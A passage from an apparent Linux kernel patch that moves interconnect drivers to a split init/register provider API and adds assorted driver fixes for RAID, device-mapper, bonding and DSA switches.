++++ b/drivers/interconnect/imx/imx.c
+@@ -295,6 +295,9 @@ int imx_icc_register(struct platform_device *pdev,
+ 	provider->xlate = of_icc_xlate_onecell;
+ 	provider->data = data;
+ 	provider->dev = dev->parent;
++
++	icc_provider_init(provider);
++
+ 	platform_set_drvdata(pdev, imx_provider);
+ 
+ 	if (settings) {
+@@ -306,20 +309,18 @@ int imx_icc_register(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
++	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	if (ret)
+ 		return ret;
+-	}
+ 
+-	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	ret = icc_provider_register(provider);
+ 	if (ret)
+-		goto provider_del;
++		goto err_unregister_nodes;
+ 
+ 	return 0;
+ 
+-provider_del:
+-	icc_provider_del(provider);
++err_unregister_nodes:
++	imx_icc_unregister_nodes(&imx_provider->provider);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_register);
+@@ -328,9 +329,8 @@ void imx_icc_unregister(struct platform_device *pdev)
+ {
+ 	struct imx_icc_provider *imx_provider = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&imx_provider->provider);
+ 	imx_icc_unregister_nodes(&imx_provider->provider);
+-
+-	icc_provider_del(&imx_provider->provider);
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_unregister);
+ 
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index df3196f725368..4180a06681b2b 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -503,7 +503,6 @@ regmap_done:
+ 	}
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+ 	provider->pre_aggregate = qcom_icc_pre_bw_aggregate;
+@@ -511,12 +510,7 @@ regmap_done:
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -524,7 +518,7 @@ regmap_done:
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -538,17 +532,26 @@ regmap_done:
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+@@ -558,9 +561,9 @@ int qnoc_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/icc-rpmh.c b/drivers/interconnect/qcom/icc-rpmh.c
+index fd17291c61eb9..fdb5e58e408b4 100644
+--- a/drivers/interconnect/qcom/icc-rpmh.c
++++ b/drivers/interconnect/qcom/icc-rpmh.c
+@@ -192,9 +192,10 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	provider->pre_aggregate = qcom_icc_pre_aggregate;
+ 	provider->aggregate = qcom_icc_aggregate;
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
++	icc_provider_init(provider);
++
+ 	qp->dev = dev;
+ 	qp->bcms = desc->bcms;
+ 	qp->num_bcms = desc->num_bcms;
+@@ -203,10 +204,6 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	if (IS_ERR(qp->voter))
+ 		return PTR_ERR(qp->voter);
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret)
+-		return ret;
+-
+ 	for (i = 0; i < qp->num_bcms; i++)
+ 		qcom_icc_bcm_init(qp->bcms[i], dev);
+ 
+@@ -218,7 +215,7 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qn->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qn->name;
+@@ -232,16 +229,27 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	data->num_nodes = num_nodes;
++
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(qcom_icc_rpmh_probe);
+@@ -250,8 +258,8 @@ int qcom_icc_rpmh_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/msm8974.c b/drivers/interconnect/qcom/msm8974.c
+index 5ea192f1141dc..1828deaca4432 100644
+--- a/drivers/interconnect/qcom/msm8974.c
++++ b/drivers/interconnect/qcom/msm8974.c
+@@ -692,7 +692,6 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = msm8974_icc_set;
+ 	provider->aggregate = icc_std_aggregate;
+@@ -700,11 +699,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	provider->data = data;
+ 	provider->get_bw = msm8974_get_bw;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		goto err_disable_clks;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -712,7 +707,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err_del_icc;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -729,15 +724,16 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ 
+-err_del_icc:
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-
+-err_disable_clks:
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+ 
+ 	return ret;
+@@ -747,9 +743,9 @@ static int msm8974_icc_remove(struct platform_device *pdev)
+ {
+ 	struct msm8974_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 5fa1710874258..3a1cbfe3e481f 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -158,8 +158,8 @@ static int qcom_osm_l3_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_osm_l3_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+@@ -245,14 +245,9 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	provider->set = qcom_osm_l3_set;
+ 	provider->aggregate = icc_std_aggregate;
+ 	provider->xlate = of_icc_xlate_onecell;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -275,12 +270,15 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ err:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/interconnect/samsung/exynos.c b/drivers/interconnect/samsung/exynos.c
+index 6559d8cf80687..72e42603823b9 100644
+--- a/drivers/interconnect/samsung/exynos.c
++++ b/drivers/interconnect/samsung/exynos.c
+@@ -98,12 +98,13 @@ static int exynos_generic_icc_remove(struct platform_device *pdev)
+ 	struct exynos_icc_priv *priv = platform_get_drvdata(pdev);
+ 	struct icc_node *parent_node, *node = priv->node;
+ 
++	icc_provider_deregister(&priv->provider);
++
+ 	parent_node = exynos_icc_get_parent(priv->dev->parent->of_node);
+ 	if (parent_node && !IS_ERR(parent_node))
+ 		icc_link_destroy(node, parent_node);
+ 
+ 	icc_nodes_remove(&priv->provider);
+-	icc_provider_del(&priv->provider);
+ 
+ 	return 0;
+ }
+@@ -132,15 +133,11 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	provider->inter_set = true;
+ 	provider->data = priv;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret < 0)
+-		return ret;
++	icc_provider_init(provider);
+ 
+ 	icc_node = icc_node_create(pdev->id);
+-	if (IS_ERR(icc_node)) {
+-		ret = PTR_ERR(icc_node);
+-		goto err_prov_del;
+-	}
++	if (IS_ERR(icc_node))
++		return PTR_ERR(icc_node);
+ 
+ 	priv->node = icc_node;
+ 	icc_node->name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "%pOFn",
+@@ -149,6 +146,9 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 				 &priv->bus_clk_ratio))
+ 		priv->bus_clk_ratio = EXYNOS_ICC_DEFAULT_BUS_CLK_RATIO;
+ 
++	icc_node->data = priv;
++	icc_node_add(icc_node, provider);
++
+ 	/*
+ 	 * Register a PM QoS request for the parent (devfreq) device.
+ 	 */
+@@ -157,9 +157,6 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_node_del;
+ 
+-	icc_node->data = priv;
+-	icc_node_add(icc_node, provider);
+-
+ 	icc_parent_node = exynos_icc_get_parent(bus_dev->of_node);
+ 	if (IS_ERR(icc_parent_node)) {
+ 		ret = PTR_ERR(icc_parent_node);
+@@ -171,14 +168,17 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 			goto err_pmqos_del;
+ 	}
+ 
++	ret = icc_provider_register(provider);
++	if (ret < 0)
++		goto err_pmqos_del;
++
+ 	return 0;
+ 
+ err_pmqos_del:
+ 	dev_pm_qos_remove_request(&priv->qos_req);
+ err_node_del:
+ 	icc_nodes_remove(provider);
+-err_prov_del:
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/md/Kconfig b/drivers/md/Kconfig
+index 998a5cfdbc4e9..662d219c39bf4 100644
+--- a/drivers/md/Kconfig
++++ b/drivers/md/Kconfig
+@@ -16,6 +16,10 @@ if MD
+ config BLK_DEV_MD
+ 	tristate "RAID support"
+ 	select BLOCK_HOLDER_DEPRECATED if SYSFS
++	# BLOCK_LEGACY_AUTOLOAD requirement should be removed
++	# after relevant mdadm enhancements - to make "names=yes"
++	# the default - are widely available.
++	select BLOCK_LEGACY_AUTOLOAD
+ 	help
+ 	  This driver lets you combine several hard disk partitions into one
+ 	  logical block device. This can be used to simply append one
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 605662935ce91..fdcf42554e2a9 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -510,10 +510,10 @@ static void dm_io_acct(struct dm_io *io, bool end)
+ 		sectors = io->sectors;
+ 
+ 	if (!end)
+-		bdev_start_io_acct(bio->bi_bdev, sectors, bio_op(bio),
+-				   start_time);
++		bdev_start_io_acct(bio->bi_bdev, bio_op(bio), start_time);
+ 	else
+-		bdev_end_io_acct(bio->bi_bdev, bio_op(bio), start_time);
++		bdev_end_io_acct(bio->bi_bdev, bio_op(bio), sectors,
++				 start_time);
+ 
+ 	if (static_branch_unlikely(&stats_enabled) &&
+ 	    unlikely(dm_stats_used(&md->stats))) {
+diff --git a/drivers/media/i2c/m5mols/m5mols_core.c b/drivers/media/i2c/m5mols/m5mols_core.c
+index 2b01873ba0db5..5c2336f318d9a 100644
+--- a/drivers/media/i2c/m5mols/m5mols_core.c
++++ b/drivers/media/i2c/m5mols/m5mols_core.c
+@@ -488,7 +488,7 @@ static enum m5mols_restype __find_restype(u32 code)
+ 	do {
+ 		if (code == m5mols_default_ffmt[type].code)
+ 			return type;
+-	} while (type++ != SIZE_DEFAULT_FFMT);
++	} while (++type != SIZE_DEFAULT_FFMT);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/memory/tegra/mc.c b/drivers/memory/tegra/mc.c
+index 592907546ee64..5cd28619ea9fb 100644
+--- a/drivers/memory/tegra/mc.c
++++ b/drivers/memory/tegra/mc.c
+@@ -794,16 +794,12 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 	mc->provider.aggregate = mc->soc->icc_ops->aggregate;
+ 	mc->provider.xlate_extended = mc->soc->icc_ops->xlate_extended;
+ 
+-	err = icc_provider_add(&mc->provider);
+-	if (err)
+-		return err;
++	icc_provider_init(&mc->provider);
+ 
+ 	/* create Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_MC);
+-	if (IS_ERR(node)) {
+-		err = PTR_ERR(node);
+-		goto del_provider;
+-	}
++	if (IS_ERR(node))
++		return PTR_ERR(node);
+ 
+ 	node->name = "Memory Controller";
+ 	icc_node_add(node, &mc->provider);
+@@ -830,12 +826,14 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 			goto remove_nodes;
+ 	}
+ 
++	err = icc_provider_register(&mc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&mc->provider);
+-del_provider:
+-	icc_provider_del(&mc->provider);
+ 
+ 	return err;
+ }
+diff --git a/drivers/memory/tegra/tegra124-emc.c b/drivers/memory/tegra/tegra124-emc.c
+index 85bc936c02f94..00ed2b6a0d1b2 100644
+--- a/drivers/memory/tegra/tegra124-emc.c
++++ b/drivers/memory/tegra/tegra124-emc.c
+@@ -1351,15 +1351,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1380,12 +1378,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra20-emc.c b/drivers/memory/tegra/tegra20-emc.c
+index bd4e37b6552de..fd595c851a278 100644
+--- a/drivers/memory/tegra/tegra20-emc.c
++++ b/drivers/memory/tegra/tegra20-emc.c
+@@ -1021,15 +1021,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1050,12 +1048,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra30-emc.c b/drivers/memory/tegra/tegra30-emc.c
+index 77706e9bc5433..c91e9b7e2e019 100644
+--- a/drivers/memory/tegra/tegra30-emc.c
++++ b/drivers/memory/tegra/tegra30-emc.c
+@@ -1533,15 +1533,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1562,12 +1560,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index 7ef828942df35..89953093e20c7 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -369,7 +369,7 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 					MAX_POWER_ON_TIMEOUT, false, host, val,
+ 					reg);
+ 		if (ret)
+-			dev_warn(mmc_dev(host->mmc), "Power on failed\n");
++			dev_info(mmc_dev(host->mmc), "Power on failed\n");
+ 	}
+ }
+ 
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 0363ce5976614..116d295df0b55 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1773,6 +1773,19 @@ void bond_lower_state_changed(struct slave *slave)
+ 		slave_err(bond_dev, slave_dev, "Error: %s\n", errmsg);	\
+ } while (0)
+ 
++/* The bonding driver uses ether_setup() to convert a master bond device
++ * to ARPHRD_ETHER, that resets the target netdevice's flags so we always
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ */
++static void bond_ether_setup(struct net_device *bond_dev)
++{
++	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++
++	ether_setup(bond_dev);
++	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++}
++
+ /* enslave device <slave> to bond device <master> */
+ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 		 struct netlink_ext_ack *extack)
+@@ -1864,10 +1877,8 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 
+ 			if (slave_dev->type != ARPHRD_ETHER)
+ 				bond_setup_by_slave(bond_dev, slave_dev);
+-			else {
+-				ether_setup(bond_dev);
+-				bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+-			}
++			else
++				bond_ether_setup(bond_dev);
+ 
+ 			call_netdevice_notifiers(NETDEV_POST_TYPE_CHANGE,
+ 						 bond_dev);
+@@ -2287,9 +2298,7 @@ err_undo_flags:
+ 			eth_hw_addr_random(bond_dev);
+ 		if (bond_dev->type != ARPHRD_ETHER) {
+ 			dev_close(bond_dev);
+-			ether_setup(bond_dev);
+-			bond_dev->flags |= IFF_MASTER;
+-			bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++			bond_ether_setup(bond_dev);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 9b20c2ee6d62a..19cd05762ab77 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -310,7 +310,7 @@ static const u16 ksz8795_regs[] = {
+ 	[S_BROADCAST_CTRL]		= 0x06,
+ 	[S_MULTICAST_CTRL]		= 0x04,
+ 	[P_XMII_CTRL_0]			= 0x06,
+-	[P_XMII_CTRL_1]			= 0x56,
++	[P_XMII_CTRL_1]			= 0x06,
+ };
+ 
+ static const u32 ksz8795_masks[] = {
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 003672d71a3bf..178e5a3441e68 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -430,8 +430,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	switch (interface) {
+ 	case PHY_INTERFACE_MODE_RGMII:
+ 		trgint = 0;
+-		/* PLL frequency: 125MHz */
+-		ncpo1 = 0x0c80;
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
+@@ -462,38 +460,40 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+-	/* Lower Tx Driving for TRGMII path */
+-	for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-	/* Disable MT7530 core and TRGMII Tx clocks */
+-	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	/* Setup the MT7530 TRGMII Tx Clock */
+-	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+-	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+-	core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP4,
+-		   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
+-		   RG_SYSPLL_BIAS_LPF_EN);
+-	core_write(priv, CORE_PLL_GROUP2,
+-		   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
+-		   RG_SYSPLL_POSDIV(1));
+-	core_write(priv, CORE_PLL_GROUP7,
+-		   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+-		   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+-
+-	/* Enable MT7530 core and TRGMII Tx clocks */
+-	core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-		 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	if (!trgint)
++	if (trgint) {
++		/* Lower Tx Driving for TRGMII path */
++		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
++			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
++				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++		/* Disable MT7530 core and TRGMII Tx clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
++			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++
++		/* Setup the MT7530 TRGMII Tx Clock */
++		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
++		core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
++		core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP4,
++			   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
++			   RG_SYSPLL_BIAS_LPF_EN);
++		core_write(priv, CORE_PLL_GROUP2,
++			   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
++			   RG_SYSPLL_POSDIV(1));
++		core_write(priv, CORE_PLL_GROUP7,
++			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
++			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
++
++		/* Enable MT7530 core and TRGMII Tx clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
++			 REG_GSWCK_EN | REG_TRGMIICK_EN);
++	} else {
+ 		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+ 			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+ 				   RD_TAP_MASK, RD_TAP(16));
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2206,7 +2206,7 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
+-	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
++	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+ 	val |= MHWTRAP_MANUAL;
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 242b8b325504a..89829e0ca8e8f 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3549,7 +3549,7 @@ static int mv88e6xxx_get_max_mtu(struct dsa_switch *ds, int port)
+ 		return 10240 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		return 1632 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+-	return 1522 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
++	return ETH_DATA_LEN;
+ }
+ 
+ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+@@ -3557,6 +3557,17 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	struct mv88e6xxx_chip *chip = ds->priv;
+ 	int ret = 0;
+ 
++	/* For families where we don't know how to alter the MTU,
++	 * just accept any value up to ETH_DATA_LEN
++	 */
++	if (!chip->info->ops->port_set_jumbo_size &&
++	    !chip->info->ops->set_max_frame_size) {
++		if (new_mtu > ETH_DATA_LEN)
++			return -EINVAL;
++
++		return 0;
++	}
++
+ 	if (dsa_is_dsa_port(ds, port) || dsa_is_cpu_port(ds, port))
+ 		new_mtu += EDSA_HLEN;
+ 
